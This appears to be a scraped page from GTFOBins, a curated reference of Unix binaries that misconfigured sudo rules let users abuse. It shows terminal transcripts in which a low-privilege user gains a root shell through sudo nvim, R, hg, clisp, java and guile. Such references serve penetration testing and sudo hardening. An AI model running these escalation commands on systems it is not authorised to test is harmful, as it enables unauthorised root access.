GTFOBins.github.io
GTFOBins.github.io copied to clipboard
GTFOBins
GTFOBins is a curated list of Unix binaries that can be used to bypass local security restrictions in misconfigured systems
``` lowpriv@7dc99421ba84:/tmp$ sudo nvim -c ':terminal' root@7dc99421ba84:/tmp# id uid=0(root) gid=0(root) groups=0(root) ```
``` lowpriv@7dc99421ba84:/tmp$ sudo R --no-save -e 'system("sh")' R version 4.3.3 (2024-02-29) -- "Angel Food Cake" Copyright (C) 2024 The R Foundation for Statistical Computing Platform: aarch64-unknown-linux-gnu (64-bit) R is free...
``` lowpriv@7dc99421ba84:/tmp$ sudo hg --config alias.root='!sh' root # id uid=0(root) gid=0(root) groups=0(root) # ```
``` lowpriv@7dc99421ba84:/tmp$ sudo clisp -x '(ext:run-shell-command "sh") (ext:exit)' i i i i i i i ooooo o ooooooo ooooo ooooo I I I I I I I 8 8 8...
``` lowpriv@7dc99421ba84:/tmp$ TD=$(mktemp -d) SOURCE='public class Exec { public static void main(String[] args) throws Exception { new ProcessBuilder("/bin/sh").inheritIO().start().waitFor(); } }' echo "$SOURCE" > $TD/Exec.java javac $TD/Exec.java sudo java -cp $TD...
``` lowpriv@d25011a50a5d:/$ id uid=1001(lowpriv) gid=1001(lowpriv) groups=1001(lowpriv) lowpriv@d25011a50a5d:/$ sudo guile -c '(system "sh")' # id uid=0(root) gid=0(root) groups=0(root) ```
